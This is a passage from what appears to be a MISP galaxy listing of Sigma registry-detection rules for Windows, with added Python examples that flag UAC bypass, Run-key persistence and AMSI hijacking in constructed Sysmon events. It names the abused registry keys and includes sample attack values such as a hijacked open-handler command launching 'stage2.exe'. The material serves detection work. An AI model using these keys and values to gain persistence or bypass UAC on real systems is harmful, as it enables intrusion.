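     "TargetObject": TS + "fDenyTSConnections", "Details": "DWORD (0x00000001)"},
    # Unrelated value under the same key (listener port 3389): no finding.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": TS + "WinStations\\RDP-Tcp\\PortNumber", "Details": "DWORD (0x00000D3D)"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The policy-key match is what the rule's falsepositive note is about: an administrator applying Group Policy produces the same write, so the `Image` field (svchost.exe hosting the policy client versus reg.exe or an unknown binary) is the first thing to look at when triaging.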
Macro Enabled In A Potentially Suspicious Document
Detects registry changes to Office trust records where the path is located in a potentially suspicious location
Internal MISP references
UUID a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd which can be used as unique global reference for Macro Enabled In A Potentially Suspicious Document in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-21 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_office_trust_record_susp_location.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Bypass UAC Using Event Viewer
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
Internal MISP references
UUID 674202d0-b22a-4af4-ae5f-2eda1f3da1af which can be used as unique global reference for Bypass UAC Using Event Viewer in MISP communities and other software using the MISP galaxy
External references
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_bypass_uac_using_eventviewer.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Mpnotify
Detects changes to the "mpnotify" value under the Winlogon registry key, which names a binary for Winlogon to run and could therefore be pointed at an attacker-supplied executable for persistence and defense evasion
Internal MISP references
UUID 92772523-d9c1-4c93-9547-b0ca500baba3 which can be used as unique global reference for Potential Persistence Via Mpnotify in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Might trigger if the value is changed legitimately. But this is not a common occurrence in an environment and should be investigated either way'] |
| filename | registry_set_persistence_mpnotify.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Potentially Suspicious ODBC Driver Registered
Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
Internal MISP references
UUID e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 which can be used as unique global reference for Potentially Suspicious ODBC Driver Registered in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-23 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_odbc_driver_registered_susp.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.persistence', 'attack.t1003'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via Visual Studio Tools for Office
Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
Internal MISP references
UUID 9d15044a-7cfe-4d23-8085-6ebc11df7685 which can be used as unique global reference for Potential Persistence Via Visual Studio Tools for Office in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Bhabesh Raj |
| creation_date | 2021-01-10 |
| falsepositive | ['Legitimate Addin Installation'] |
| filename | registry_set_persistence_office_vsto.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.t1137.006', 'attack.persistence'] |
Related clusters
To see the related clusters, click here.
Driver Added To Disallowed Images In HVCI - Registry
Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
Internal MISP references
UUID 555155a2-03bf-4fe7-af74-d176b3fdbe16 which can be used as unique global reference for Driver Added To Disallowed Images In HVCI - Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf - webarchive
- https://x.com/yarden_shafir/status/1822667605175324787 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) |
| creation_date | 2023-12-05 |
| falsepositive | ['Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended'] |
| filename | registry_set_hvci_disallowed_images.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Uncommon Microsoft Office Trusted Location Added
Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
Internal MISP references
UUID f742bde7-9528-42e5-bd82-84f51a8387d2 which can be used as unique global reference for Uncommon Microsoft Office Trusted Location Added in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-21 |
| falsepositive | ['Other unknown legitimate or custom paths need to be filtered to avoid false positives'] |
| filename | registry_set_office_trusted_location_uncommon.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Modify User Shell Folders Startup Value
Detects modification of the "Startup" value under User Shell Folders to a path where a payload could be stored and launched during startup
Internal MISP references
UUID 9c226817-8dc9-46c2-a58d-66655aafd7dc which can be used as unique global reference for Modify User Shell Folders Startup Value in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-10-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_susp_user_shell_folders.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Disable Administrative Share Creation at Startup
Detects registry changes that disable the automatic creation of administrative shares at startup (e.g. "AutoShareWks" or "AutoShareServer" under the LanmanServer parameters set to 0, as in the referenced atomic test). Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system.
Internal MISP references
UUID c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e which can be used as unique global reference for Disable Administrative Share Creation at Startup in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-16 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_administrative_share.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.005'] |
Related clusters
To see the related clusters, click here.
MaxMpxCt Registry Value Changed
Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum number of outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
Internal MISP references
UUID 0e6a9e62-627e-496c-aef5-bfa39da29b5e which can be used as unique global reference for MaxMpxCt Registry Value Changed in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1 - webarchive
- https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps - webarchive
- https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-03-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_optimize_file_sharing_network.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.005'] |
Related clusters
To see the related clusters, click here.
New ODBC Driver Registered
Detects the registration of a new ODBC driver.
Internal MISP references
UUID 3390fbef-c98d-4bdd-a863-d65ed7c610dd which can be used as unique global reference for New ODBC Driver Registered in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-23 |
| falsepositive | ['Likely'] |
| filename | registry_set_odbc_driver_registered.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Wow6432Node Classes Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID 18f2065c-d36c-464a-a748-bcf909acb2e3 which can be used as unique global reference for Wow6432Node Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_wow6432node_classes.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Uncommon Extension In Keyboard Layout IME File Registry Value
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Internal MISP references
UUID b888e3f2-224d-4435-b00b-9dd66e9ea1f1 which can be used as unique global reference for Uncommon Extension In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2023-11-21 |
| falsepositive | ['IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.'] |
| filename | registry_set_ime_non_default_extension.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Persistence Via New SIP Provider
Detects when an attacker registers a new SIP provider for persistence and defense evasion
Internal MISP references
UUID 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 which can be used as unique global reference for Persistence Via New SIP Provider in MISP communities and other software using the MISP galaxy
External references
- https://github.com/gtworek/PSBits/tree/master/SIP - webarchive
- https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - webarchive
- https://persistence-info.github.io/Data/codesigning.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['Legitimate SIP being registered by the OS or different software.'] |
| filename | registry_set_sip_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1553.003'] |
Related clusters
To see the related clusters, click here.
Potential Persistence Via AutodialDLL
Detects changes to the "AutodialDLL" value, which could be used as a persistence method to load a custom DLL via the "ws2_32" library
Internal MISP references
UUID e6fe26ee-d063-4f5b-b007-39e90aaf50e3 which can be used as unique global reference for Potential Persistence Via AutodialDLL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-10 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_persistence_autodial_dll.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Custom File Open Handler Executes PowerShell
Detects the abuse of a custom file open handler to execute PowerShell
Internal MISP references
UUID 7530b96f-ad8e-431d-a04d-ac85cc461fdc which can be used as unique global reference for Custom File Open Handler Executes PowerShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | CD_R0M_ |
| creation_date | 2022-06-11 |
| falsepositive | ['Unknown'] |
| filename | registry_set_custom_file_open_handler_powershell_execution.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
ClickOnce Trust Prompt Tampering
Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
Internal MISP references
UUID ac9159cc-c364-4304-8f0a-d63fc1a0aabb which can be used as unique global reference for ClickOnce Trust Prompt Tampering in MISP communities and other software using the MISP galaxy
External references
- https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 - webarchive
- https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @SerkinValery, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-12 |
| falsepositive | ['Legitimate internal requirements.'] |
| filename | registry_set_clickonce_trust_prompt.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Windows Recall Feature Enabled - Registry
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Internal MISP references
UUID 75180c5f-4ea1-461a-a4f6-6e4700c065d4 which can be used as unique global reference for Windows Recall Feature Enabled - Registry in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall - webarchive
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sajid Nawaz Khan |
| creation_date | 2024-06-02 |
| falsepositive | ['Legitimate use/activation of Windows Recall'] |
| filename | registry_set_enable_windows_recall.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1113'] |
Related clusters
To see the related clusters, click here.
COM Hijack via Sdclt
Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
Internal MISP references
UUID 07743f65-7ec9-404a-a519-913db7118a8d which can be used as unique global reference for COM Hijack via Sdclt in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Omkar Gudhate |
| creation_date | 2020-09-27 |
| falsepositive | ['Unknown'] |
| filename | registry_set_comhijack_sdclt.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1546', 'attack.t1548'] |
Related clusters
To see the related clusters, click here.
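As an added example covering both the Event Viewer bypass listed earlier on this page (the per-user "mscfile" open handler) and this sdclt entry (the "Folder\shell\open\command\DelegateExecute" value), the Python below classifies constructed Sysmon Event ID 13 records. It is not code from the Sigma rules or their references. The only specifics taken from the page are those two key paths; the "(Default)" value naming, the folding of "HKU\<SID>" and "HKU\<SID>_Classes" onto HKCU, and the sample events are assumptions about Sysmon's registry_set output.

```python
import re

# Sysmon writes per-user hives as HKU\<SID>\... or HKU\<SID>_Classes\...; the
# latter is the backing hive of HKCU\Software\Classes. Fold both onto HKCU so
# the lookup below does not depend on the user's SID.
_USER_HIVE_RE = re.compile(r"^HKU\\S-1-5-21-[\d-]+(_Classes)?\\", re.IGNORECASE)


def normalize_user_hive(target):
    match = _USER_HIVE_RE.match(target)
    if not match:
        return target
    rest = target[match.end():]
    if match.group(1):
        return "HKCU\\Software\\Classes\\" + rest
    return "HKCU\\" + rest


# Per-user handler keys abused by the bypasses on this page (assumed exact
# paths; Sysmon names a key's default value "(Default)").
HIJACK_KEYS = {
    "hkcu\\software\\classes\\mscfile\\shell\\open\\command\\(default)":
        "eventvwr.exe: mscfile open handler replaced",
    "hkcu\\software\\classes\\folder\\shell\\open\\command\\delegateexecute":
        "sdclt.exe: Folder open handler DelegateExecute set",
    "hkcu\\software\\classes\\folder\\shell\\open\\command\\(default)":
        "sdclt.exe: Folder open handler command replaced",
}


def classify_hijack(event):
    """Return a dict describing a per-user shell handler hijack, or None."""
    if event.get("EventID") != 13:
        return None
    key = normalize_user_hive(event.get("TargetObject", ""))
    technique = HIJACK_KEYS.get(key.lower())
    if technique is None:
        return None
    return {
        "technique": technique,
        "key": key,
        "payload": event.get("Details", ""),
        "image": event.get("Image", ""),
    }


def scan(events):
    return [hit for hit in map(classify_hijack, events) if hit]


# Constructed sample telemetry with a made-up SID; not real logs.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    # Event Viewer bypass: HKCU\Software\Classes is logged via the _Classes hive.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": f"HKU\\{SID}_Classes\\mscfile\\shell\\open\\command\\(Default)",
     "Details": "C:\\Users\\Public\\stage2.exe"},
    # sdclt bypass: DelegateExecute created (empty), then the command value set.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": f"HKU\\{SID}\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": f"HKU\\{SID}\\Software\\Classes\\Folder\\shell\\open\\command\\(Default)",
     "Details": "cmd.exe /c C:\\Users\\Public\\stage2.exe"},
    # Machine-wide handler written by an installer: not the per-user shadowing
    # these bypasses rely on, so it is left to other rules.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Classes\\mscfile\\shell\\open\\command\\(Default)",
     "Details": "%SystemRoot%\\system32\\mmc.exe \"%1\" %*"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['technique']} -> {hit['payload']!r} via {hit['image']}")
```

Matching on the raw `TargetObject` with a `contains` on `\Classes\mscfile\shell\open\command` would also work, but normalizing the hive first lets the same table distinguish a per-user write (the bypass) from a machine-wide one (usually an installer), which matters for the alert's priority.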
Service Binary in Suspicious Folder
Detects the creation of a service with a service binary located in a suspicious directory
Internal MISP references
UUID a07f0359-4c90-4dc4-a681-8ffea40b4f47 which can be used as unique global reference for Service Binary in Suspicious Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), frack113 |
| creation_date | 2022-05-02 |
| falsepositive | ['Unknown'] |
| filename | registry_set_creation_service_susp_folder.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Suspicious Printer Driver Empty Manufacturer
Detects a suspicious printer driver installation with an empty Manufacturer value
Internal MISP references
UUID e0813366-0407-449a-9869-a2db1119dc41 which can be used as unique global reference for Suspicious Printer Driver Empty Manufacturer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2020-07-01 |
| falsepositive | ['Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value'] |
| filename | registry_set_susp_printer_driver.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1574', 'cve.2021-1675'] |
Related clusters
To see the related clusters, click here.
Potential PowerShell Execution Policy Tampering
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
Internal MISP references
UUID fad91067-08c5-4d1a-8d8c-d96a21b37814 which can be used as unique global reference for Potential PowerShell Execution Policy Tampering in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-11 |
| falsepositive | ['Unknown'] |
| filename | registry_set_powershell_execution_policy.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
UAC Bypass via Sdclt
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
Internal MISP references
UUID 5b872a46-3b90-45c1-8419-f675db8053aa which can be used as unique global reference for UAC Bypass via Sdclt in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Omer Yampel, Christian Burkard (Nextron Systems) |
| creation_date | 2017-03-17 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_bypass_sdclt.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'car.2019-04-001'] |
Related clusters
To see the related clusters, click here.
New RUN Key Pointing to Suspicious Folder
Detects suspicious new RUN key element pointing to an executable in a suspicious folder
Internal MISP references
UUID 02ee49e2-e294-4d0f-9278-f5b3212fc588 which can be used as unique global reference for New RUN Key Pointing to Suspicious Folder in MISP communities and other software using the MISP galaxy
External references
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2018-08-25 |
| falsepositive | ['Software using weird folders for updates'] |
| filename | registry_set_susp_run_key_img_folder.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
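As an added example (not code from the Sigma rule or its references), the Python below applies this rule's idea to constructed Sysmon Event ID 13 records: a Run or RunOnce value whose command references a folder that legitimate autostarts rarely use. The key fragment, the folder list and the sample events are assumptions made here; the published rule's lists may differ and, as its falsepositive note says, need tuning for software that stages updates in odd folders.

```python
import re

# Run and RunOnce keys in any hive (assumed fragment; the rule may cover more ASEPs).
RUN_KEY_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?\\", re.IGNORECASE)

# Folder fragments a legitimate autostart entry rarely points into (assumed
# list; tune it for software that stages updates in odd folders).
SUSPICIOUS_FOLDERS = (
    "\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\programdata\\",
    "%temp%\\",
    "%tmp%\\",
    "\\downloads\\",
    "\\desktop\\",
    "\\$recycle.bin\\",
)


def image_from_command(command):
    """Return the program path from a Run value: the quoted path if the value
    starts with a quote, otherwise the first whitespace-delimited token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def suspicious_run_entry(event):
    """Flag a Run value whose command references a suspicious folder anywhere,
    so a system launcher with the payload in its arguments is caught as well."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    if not RUN_KEY_RE.search(target):
        return None
    command = event.get("Details", "")
    lowered = command.lower()
    matched = next((folder for folder in SUSPICIOUS_FOLDERS if folder in lowered), None)
    if matched is None:
        return None
    return {
        "entry": target.rsplit("\\", 1)[-1],   # the Run value name
        "image": image_from_command(command),  # what actually gets executed
        "matched": matched,
        "command": command,
    }


def scan(events):
    return [hit for hit in map(suspicious_run_entry, events) if hit]


# Constructed sample telemetry with a made-up SID; not real logs.
HKCU_RUN = "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
HKLM_RUN = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\"
SAMPLE_EVENTS = [
    # Payload dropped to the user's Temp folder: fires.
    {"EventID": 13, "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe",
     "TargetObject": HKCU_RUN + "Updater",
     "Details": "\"C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe\" /silent"},
    # rundll32 is a system binary, but the DLL it loads sits in ProgramData: fires.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": HKLM_RUN + "Helper",
     "Details": "rundll32.exe C:\\ProgramData\\helper.dll,Start"},
    # Normal entries: no finding.
    {"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": HKLM_RUN + "SecurityHealth",
     "Details": "%windir%\\system32\\SecurityHealthSystray.exe"},
    {"EventID": 13, "Image": "C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe",
     "TargetObject": HKCU_RUN + "OneDrive",
     "Details": "\"C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['entry']}: {hit['image']} (matched {hit['matched']})")
```

Checking the whole command rather than only the extracted image is deliberate: the second sample would be missed by an image-only check because rundll32.exe lives in System32, while the extracted image is still reported so an analyst sees at a glance whether the launcher or its argument is the interesting part.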
Potential AMSI COM Server Hijacking
Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionality. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
Internal MISP references
UUID 160d2780-31f7-4922-8b3a-efce30e63e96 which can be used as unique global reference for Potential AMSI COM Server Hijacking in MISP communities and other software using the MISP galaxy
External references
- https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass - webarchive
- https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_amsi_com_hijack.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
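As an added example (not code from the Sigma rule or the referenced enigma0x3 post), the Python below checks constructed Sysmon Event ID 13 records for writes to the InprocServer32 value of the AMSI COM server CLSID used in that post. Two cases are treated as findings: any per-user registration of that CLSID, which shadows the machine-wide one for the user's non-elevated processes regardless of the path, and a machine-wide value that no longer points at amsi.dll in System32. The expected path, the %windir% expansion and the sample events are assumptions made for this example.

```python
import re

# CLSID of the AMSI COM server that the referenced enigma0x3 technique re-registers;
# its legitimate InprocServer32 is amsi.dll in System32 (expected path assumed below).
AMSI_CLSID = "{fdb00e52-a214-4aa1-8fba-4357bb0072ec}"
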